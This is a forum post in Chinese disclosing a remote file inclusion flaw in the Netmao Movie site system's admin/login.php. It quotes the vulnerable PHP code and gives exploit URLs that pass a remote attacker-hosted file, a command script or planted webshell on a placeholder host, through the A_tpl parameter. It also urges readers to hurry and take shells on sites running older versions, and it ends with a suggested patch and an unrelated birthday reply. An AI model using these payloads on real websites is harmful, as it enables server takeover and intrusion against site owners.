服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2007-11-27 20:29:18

Netmao Movie网猫电影系统漏洞

<FONT size=2>IceskYsl在NOHACK上发表的php漏洞专题。第一次就是包含文件漏洞。<BR><BR>那今天我就很快找到了一个,不敢独享!呵呵。<BR><BR>程序:Netmao Movie网猫电影系统。<BR><BR>说明下:现在它的最新版本是3.0,由于加密了,所以就不好继续研究。<BR>不过网上使用的很多都不是最新的版本。所以想拿shell的要赶快哦。<BR><BR>漏洞文件:admin目录下的login.php文件。<BR><BR>代码:<BR><BR>if($action=='login'){<BR><BR>&nbsp; &nbsp; @session_start();<BR>&nbsp; &nbsp; if($_SESSION['randomstr']!=$checkcode){<BR>&nbsp; &nbsp; &nbsp; cpmsg('对不起,验证码错误','?file=login');<BR>&nbsp; &nbsp; &nbsp; exit();<BR>&nbsp; &nbsp; }<BR><BR>&nbsp; &nbsp; $referer=$referer?$referer:'?file=';<BR><BR>&nbsp; &nbsp; $username=addslashes($username);<BR>&nbsp; &nbsp; $password=addslashes($password);<BR>&nbsp; &nbsp; $password=MD5($password);<BR><BR>&nbsp; &nbsp; $result=$db-&gt;query("Select * FROM $table_member Where user='$username' AND pwd='$password'");<BR>&nbsp; if($db-&gt;num_rows($result)==1){<BR>&nbsp; &nbsp; &nbsp; $r=$db-&gt;fetch_array($result);<BR>&nbsp; &nbsp; &nbsp; $_SESSION=$r[$user];<BR>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if($r=='1'){$_SESSION='1';}<BR>&nbsp; &nbsp; &nbsp; cpmsg("登录成功!",$referer);<BR>&nbsp; }else{<BR>&nbsp; &nbsp; session_destroy();<BR>&nbsp; &nbsp; cpmsg("对不起,帐号和密码不匹配!",$referer);<BR>&nbsp; }<BR><BR>}elseif($action=='logout'){<BR><BR>&nbsp; &nbsp; session_destroy();<BR>&nbsp; &nbsp; cpmsg("你已经成功退出!",'?file=login');<BR><BR>}<BR>else<BR>{<BR><BR>&nbsp; &nbsp; include $A_tpl.'/login.tpl.php';<BR>&nbsp; &nbsp; &nbsp; <BR>}<BR><BR>我们直奔else语句里的代码。变量A_tpl 没赋值,直接拿来用。<BR>直接输入admin/login.php可以暴出路径。<BR><BR>EXP:<BR>⑴<BR>admin/login.php?A_tpl=http://www.xxxx.com/cmd.txt?<BR>⑵<BR>在一个不支持php脚本的空间建立一个login.tpl.php(当然是自己的脚本木马咯)<BR>访问admin/login.php?A_tpl=http://www.xxxx.com 即可。<BR><BR><BR>好了,结束。。初来~请各位牛人多多指教。<BR>---------------------------------------------------------------------------------------------------<BR>修补漏洞的方案:<BR><BR>function StopRemoteInclude($InclueName){<BR>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if(strpos($InclueName,'\\')!==false){ &nbsp; <BR>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return substr($InclueName,0,strrpos($InclueName,'\\')); <BR>&nbsp; &nbsp; }elseif(strpos($InclueName,'/')!==false){<BR>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return substr($InclueName,0,strrpos($InclueName,'/'));<BR>&nbsp; &nbsp; }else{<BR>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return '/';<BR>&nbsp; &nbsp; }<BR>}<BR><BR>define('S_Dir',__FILE__?StopRemoteInclude(__FILE__).'/' : './');</FONT><BR>

iceman02 发表于 2006-6-8 17:27:33

re:Netmao Movie网猫电影系统漏洞

海哥,生日快乐!
页: [1]
查看完整版本: Netmao Movie网猫电影系统漏洞